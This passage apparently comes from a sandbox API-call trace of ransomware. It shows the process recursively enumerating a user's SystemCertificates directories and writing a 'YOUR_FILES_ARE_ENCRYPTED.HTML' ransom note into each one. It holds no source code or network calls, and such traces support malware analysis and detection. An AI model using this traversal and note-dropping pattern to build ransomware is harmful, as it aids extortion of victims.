returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\SystemCertificates\\*" [0123.145] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\SystemCertificates\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5ec61c93, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5ec61c93, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5ec61c93, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f230, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0123.145] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5ec61c93, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5ec61c93, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5ec61c93, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f230, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0123.145] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5ec61c93, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5ec61c93, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5ec61c93, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f230, dwReserved1=0x0, cFileName="My", cAlternateFileName="")) returned 1 [0123.145] StrStrIW (lpFirst="My", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.145] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My") returned 73 [0123.145] GetProcessHeap () returned 0x600000 [0123.146] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6b47b0 [0123.150] lstrcpyW (in: lpString1=0x6b47b0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My" [0123.150] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\*" [0123.150] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5ec61c93, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5ec61c93, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5ec61c93, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311b0f6, dwReserved1=0x311b068, cFileName=".", cAlternateFileName="")) returned 0x6268b8 [0123.150] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5ec61c93, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5ec61c93, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5ec61c93, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311b0f6, dwReserved1=0x311b068, cFileName="..", cAlternateFileName="")) returned 1 [0123.150] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x5ec61c93, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5ec61c93, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5ec61c93, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311b0f6, dwReserved1=0x311b068, cFileName="AppContainerUserCertRead", cAlternateFileName="APPCON~1")) returned 1 [0123.150] StrStrIW (lpFirst="AppContainerUserCertRead", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.150] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\AppContainerUserCertRead") returned 98 [0123.150] PathFindExtensionW (pszPath="AppContainerUserCertRead") returned="" [0123.150] lstrlenW (lpString="") returned 0 [0123.150] PathFindExtensionW (pszPath="AppContainerUserCertRead") returned="" [0123.151] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5ec61c93, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5ec61c93, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5ec61c93, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311b0f6, dwReserved1=0x311b068, cFileName="Certificates", cAlternateFileName="CERTIF~1")) returned 1 [0123.151] StrStrIW (lpFirst="Certificates", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.151] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates") returned 86 [0123.151] GetProcessHeap () returned 0x600000 [0123.151] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6c47b8 [0123.151] lstrcpyW (in: lpString1=0x6c47b8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates" [0123.151] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\*" [0123.151] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5ec61c93, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5ec61c93, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5ec61c93, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311b068, dwReserved1=0x311b070, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0123.152] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5ec61c93, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5ec61c93, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5ec61c93, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311b068, dwReserved1=0x311b070, cFileName="..", cAlternateFileName="")) returned 1 [0123.152] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5ec61c93, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5ec61c93, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5ec61c93, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311b068, dwReserved1=0x311b070, cFileName="..", cAlternateFileName="")) returned 0 [0123.152] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0123.152] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 116 [0123.152] GetProcessHeap () returned 0x600000 [0123.152] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0123.152] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\systemcertificates\\my\\certificates\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0123.157] WriteFile (in: hFile=0x320, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0123.158] CloseHandle (hObject=0x320) returned 1 [0123.159] GetProcessHeap () returned 0x600000 [0123.160] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0123.160] GetProcessHeap () returned 0x600000 [0123.160] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6c47b8 | out: hHeap=0x600000) returned 1 [0123.161] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5ec61c93, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5ec61c93, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5ec61c93, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311b0f6, dwReserved1=0x311b068, cFileName="CRLs", cAlternateFileName="")) returned 1 [0123.161] StrStrIW (lpFirst="CRLs", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.161] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs") returned 78 [0123.161] GetProcessHeap () returned 0x600000 [0123.161] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6c47b8 [0123.162] lstrcpyW (in: lpString1=0x6c47b8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs" [0123.162] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\*" [0123.162] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5ec61c93, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5ec61c93, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5ec61c93, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311b068, dwReserved1=0x311b070, cFileName=".", cAlternateFileName="")) returned 0x626978 [0123.162] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5ec61c93, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5ec61c93, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5ec61c93, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311b068, dwReserved1=0x311b070, cFileName="..", cAlternateFileName="")) returned 1 [0123.162] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5ec61c93, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5ec61c93, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5ec61c93, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311b068, dwReserved1=0x311b070, cFileName="..", cAlternateFileName="")) returned 0 [0123.162] FindClose (in: hFindFile=0x626978 | out: hFindFile=0x626978) returned 1 [0123.162] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0123.162] GetProcessHeap () returned 0x600000 [0123.162] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0123.163] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\systemcertificates\\my\\crls\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0123.164] WriteFile (in: hFile=0x320, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0123.166] CloseHandle (hObject=0x320) returned 1 [0123.166] GetProcessHeap () returned 0x600000 [0123.166] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0123.166] GetProcessHeap () returned 0x600000 [0123.166] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6c47b8 | out: hHeap=0x600000) returned 1 [0123.166] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5ec61c93, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5ec61c93, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5ec61c93, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311b0f6, dwReserved1=0x311b068, cFileName="CTLs", cAlternateFileName="")) returned 1 [0123.166] StrStrIW (lpFirst="CTLs", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.166] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs") returned 78 [0123.166] GetProcessHeap () returned 0x600000 [0123.166] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6c47b8 [0123.166] lstrcpyW (in: lpString1=0x6c47b8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs" [0123.166] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\*" [0123.167] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5ec61c93, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5ec61c93, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5ec61c93, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311b068, dwReserved1=0x311b070, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0123.167] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5ec61c93, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5ec61c93, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5ec61c93, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311b068, dwReserved1=0x311b070, cFileName="..", cAlternateFileName="")) returned 1 [0123.167] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5ec61c93, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5ec61c93, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5ec61c93, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311b068, dwReserved1=0x311b070, cFileName="..", cAlternateFileName="")) returned 0 [0123.167] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0123.167] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0123.167] GetProcessHeap () returned 0x600000 [0123.167] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0123.167] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\systemcertificates\\my\\ctls\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0123.168] WriteFile (in: hFile=0x320, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0123.169] CloseHandle (hObject=0x320) returned 1 [0123.170] GetProcessHeap () returned 0x600000 [0123.170] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0123.170] GetProcessHeap () returned 0x600000 [0123.170] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6c47b8 | out: hHeap=0x600000) returned 1 [0123.170] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5ec61c93, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5ec61c93, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5ec61c93, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311b0f6, dwReserved1=0x311b068, cFileName="CTLs", cAlternateFileName="")) returned 0 [0123.170] FindClose (in: hFindFile=0x6268b8 | out: hFindFile=0x6268b8) returned 1 [0123.170] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 103 [0123.170] GetProcessHeap () returned 0x600000 [0123.171] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0123.171] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\systemcertificates\\my\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0123.173] WriteFile (in: hFile=0x324, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0123.174] CloseHandle (hObject=0x324) returned 1 [0123.175] GetProcessHeap () returned 0x600000 [0123.175] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0123.175] GetProcessHeap () returned 0x600000 [0123.175] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b47b0 | out: hHeap=0x600000) returned 1 [0123.176] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5ec61c93, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5ec61c93, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5ec61c93, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f230, dwReserved1=0x0, cFileName="My", cAlternateFileName="")) returned 0 [0123.176] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0123.176] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\SystemCertificates\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 100 [0123.176] GetProcessHeap () returned 0x600000 [0123.176] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0123.179] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\SystemCertificates\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\systemcertificates\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0123.180] WriteFile (in: hFile=0x308, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0123.181] CloseHandle (hObject=0x308) returned 1 [0123.181] GetProcessHeap () returned 0x600000 [0123.181] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0123.181] GetProcessHeap () returned 0x600000 [0123.181] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0123.181] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80b78b76, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xa4984c62, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa4984c62, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0xff6176b4, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0123.181] StrStrIW (lpFirst="Templates", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.181] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates") returned 61 [0123.181] GetProcessHeap () returned 0x600000 [0123.181] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 